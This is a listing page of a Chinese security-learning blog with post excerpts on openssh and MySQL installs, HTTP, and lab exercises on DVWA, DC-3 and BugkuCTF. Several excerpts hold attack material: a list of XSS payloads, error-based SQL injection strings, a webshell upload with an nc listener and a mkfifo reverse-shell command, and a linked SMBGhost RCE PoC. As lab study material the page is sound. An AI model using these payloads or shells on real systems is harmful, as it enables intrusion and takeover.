- 博客(18)
- 资源 (3)
- 收藏
- 关注
RSS订阅原创 15ubuntu20.04离线安装openssh8.9.p1
一、依赖包安装依赖包下载网址:https://debian.pkgs.org/sid/debian-main-amd64/下载好将依赖包放入/software,安装mkdir /softwarecd /softwaredpkg -i libsepol1-dev_3.0-1_amd64.debdpkg -i libselinux1-dev_3.0-1build2_amd64.debdpkg -i libpam0g_1.3.1.11-1+dde_amd64.debdpkg -i li
2022-03-21 14:00:30
5288
原创 2021-11-15xss笔记
<script>alert(1)</script></script>"><script>prompt(1)</script></ScRiPt>"><ScRiPt>prompt(1)</ScRiPt>"><img src=x onerror=prompt(1)>"><svg/onload=prompt(1)>"><iframe/src=javas
2021-11-15 17:43:58
845
原创 14linux离线源码安装mysql8.0.26教程
离线源码安装mysql1:下载tar包,如果有则直接使用下载连接:https://dev.mysql.com/get/Downloads/MySQL-8.0/mysql-8.0.26-linux-glibc2.12-x86_64.tar.xzcd /home/dcsys/softwarels2:解压编译及安装mysqlsudo tar zxf mysql-boost-8.0.26.tar.gzmv mysql-8.0.26/ /data/mysql-8.0.26cd /data/m
2021-08-17 12:52:35
538
2
原创 13http详解
HTTP/HTTPS的具体区别HTTP简要通信过程:1.建立连接–>2.发送请求数据包–>3.返回响应数据包–>4.关闭连接。1.浏览器建立与web之间的连接2.浏览器将请求数据打包(生成请求数据包)并发送到web服务器3.web服务器将响应处理结果打包(生成响应数据包)并发送到web服务器。4.web服务器关闭连接。HTTPS简要通信过程:1.浏览器发送请求–>2.服务器返回网站的证书信息–>3.进行证书校验,协商SSL连接的安全等级,生成密码、和公私钥。–&
2021-07-26 23:48:08
379
原创 12从kali移动硬盘安装、到主题。
前提1.一个移动硬盘或者性能好点的U盘。2.kali官方iso镜像,下载地址:点击以下载3.分区工具:diskgenius4.虚拟机VMware16.0一、首先给我们的移动硬盘/U盘分区我这里有一个300GB的移动硬盘,是我平时日常存放文件用的。当然这也不影响,我们给它分一个区专门安装linux系统。这样这个盘既可以日常存放资料,也可以作为便携式kali linux使用。我们的kali需要3个分区:(1)大小约100MB的EFI启动分区(2)大小约8GB的交换分区(swap)(3)大小约
2021-01-30 23:14:43
902
2
原创 11S2-061漏洞复现
Struts2 S2-061 远程命令执行漏洞(CVE-2020-17530)1.漏洞描述S2-061是对S2-059的绕过,Struts2官方对S2-059的修复方式是加强OGNL表达式沙盒,而S2-061绕过了该沙盒。该漏洞影响版本范围是Struts 2.0.0到Struts 2.5.25。2.参考链接https://cwiki.apache.org/confluence/display/WW/S2-061https://github.com/ka1n4t/CVE-2020-17530htt
2020-12-30 22:48:48
181
原创 09永恒之蓝与永恒之黑的复现
一、永恒之蓝1.简介2017年3月14日,微软公布SMB远程代码执行漏洞(MS17-010),又称永恒之蓝,该漏洞在 Microsoft 服务器消息块 1.0 (SMBv1) 服务器处理某些请求时,存在多个远程执行代码漏洞。成功利用这些漏洞的攻击者可以获取在目标系统上执行代码的能力。为了利用此漏洞,在多数情况下,未经身份验证的攻击者可能向目标 SMBv1 服务器发送经特殊设计的数据包。能被攻击者利用远程执行任意代码。攻击者利用该漏洞无须权限即可实现远程代码执行,受黑客攻击的目标系统只需开机在线即可能被入
2020-08-15 18:08:39
1824
原创 08DC3后续提权过程
1.GetShell寻找可以修改PHP文件的地方TemplatesBeez3 Details and Files写入一句话木马木马地址:http://192.168.48.136/templates/beez3/html/yjh.php用蚁剑连接填写密码和地址2.提权反弹shell攻击端监听端⼝等待回连nc -lvvp 2333靶机运行反弹shell命令rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&
2020-08-11 19:12:12
237
原创 07BugkuCTF的文件包含项目
进入BugkuCTF之前我们先了解一下文件包含的基础知识。一、文件包含1.概念文件包含:程序员通常会把可重复使用函数或语句写到单个文件中,在使用某个功能时,直接调用此文件,不用再编写调用文件的过程称为包含。2.PHP 中的⽂件包含语句PHP 提供了四个⽂件包含的语句,四个语句之间略有不同:语句区别include()多次包含,如果包含失败,脚本产⽣警告,继续运⾏。include_once()⼀次包含,如果包含失败,脚本产⽣警告,继续运⾏。require()多次
2020-08-05 21:19:19
527
原创 06跨站请求伪造(CSRF)与口令(密码)安全
一、跨站请求伪造1.概述 黑客可以伪造管理员的正常请求,强制管理员给任意用户的发出各种请求。(1)基本概念 跨站请求伪造(Cross Site Request Forgery,CSRF) 。 CSRF 是⼀种攻击,它强制终端⽤户在当前对其进⾏身份验证后的Web 应⽤程序上执⾏⾮本意操作的攻 击。 CSRF 攻击的重点在于更改状态的请求,⽽不是盗取数据,因为攻击者⽆法查看伪造请求的响应。(2)关键点 受害者没有退出登录。 CS...
2020-08-03 20:48:12
336
原创 05SQL注入进阶和dc-3靶机渗透
一、DVWA的SQL注入报错注入:利用数据库的报错信息进行 SQL 注入,前提是数据库错误信息能够显示在网页中。Group by 重复键冲突?id=32 and (select 1 from (select count(*),concat(0x5e,(select database()),0x5e,floor(rand()*2))x from information_schema.tables group by x)a)?id=32 and (select 1 from (select cou
2020-07-28 23:25:20
177
原创 04SQL注入基础和联合查询
一.SQL注入漏洞1.SQL注入原理(1)程序员在处理程序和数据库交互时,使用字符串拼接的方式构造SQL语句.(2)未对用户可控参数进行足够的过滤,便将参数内容拼接到SQL语句中2.SQL注入漏洞的危害(1)攻击者可以利用SQL注入漏洞,可以获取数据库中的多种信息(例如:管理员后台账密),从而脱取数据库中的内容(脱库).(2)在特别的情况下还可以修改数据库内容、插入内容到数据库或者删除数据库中的内容。(3)如果数据库权限分配存在问题,或者数据库本身存在缺陷,攻击者可以利用SQL注入漏洞读写文件
2020-07-27 19:54:50
140
原创 03DVWA的搭建和nmap的使用
一.DVWA的搭建简介DVWA(Damn Vulnerable Web Application)中文:该死的脆弱的Web应用程序;开源的漏洞集成环境,基于PHP语言的,安装到phpStudy中即可,有四种难度级别(),开源免费,可以观察到Web应用的源代码,可以从攻防两个角度来理解漏洞.| 难度级别| 说明 ||-Low-|–|| | |...
2020-07-27 00:08:55
768
转载 phoenix BIOS设置
Phoenix BIOS,是BIOS类型中的一种,现在很多玩家的电脑还是再用phoenix bios但是大多新手玩家都找不到这个BIOS的设置选项,尤其是英文不好的玩家,那更是有难度了下面就图解一下phoenix bios的一些主要部分,让大家不迷茫图解一——基本设置按F2或者DEL 进入PHOENIX BIOS设置,就会出现如下界面,system time 设置时间格式为(时,分,秒)SYTEM DATA 设置日期LEGACY
2020-07-26 17:43:36
10334
2
原创 02HTTP协议的初相见
报文分析和响应一、利用telnet 模拟浏览器发送HTTP 请求,测试多种请求方法1.我开始用windows的cmd和powershell的telnet,连接后直接显示空白,不能输入请求,最后我在kali中用telnet发送请求(1)GET方法:用于请求服务器发送的某个资源。下面是响应报文:由状态行、响应头、响应正文三部分组成。状态行:响应报文的第一行协议/版本:HTTP/1.1响应状态码:200描述短语:OK响应头∶响应报文第二行开始到第一个空行为止的所有内容,其中包含了关于HTTP
2020-07-22 21:18:55
133
原创 01Web架构-Web架构安全分析
Web架构-Web架构安全分析Web工作机制网页、网站+web容器+中间件服务器+数据库网页:经过浏览器渲染的HTML页面,包含css与div等前端技术网页分为静态网页和动态网页。静态网页:都是一些.html文件。HTML(超文本标记语言)在浏览器中运行。只能将信息传递到浏览器、客户端、用户,没有交互功能。动态网页:利用flash、Php、Asp、Java、JavaScript等技术在网页中嵌入一些可以运行的脚本,用户浏览器在解释页面时,遇到脚本就启动运行它。实现了信息的双向流动。网站:多个网
2020-07-21 20:39:14
327
SMBGhost_RCE_PoC-master.zip
2020-08-15
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人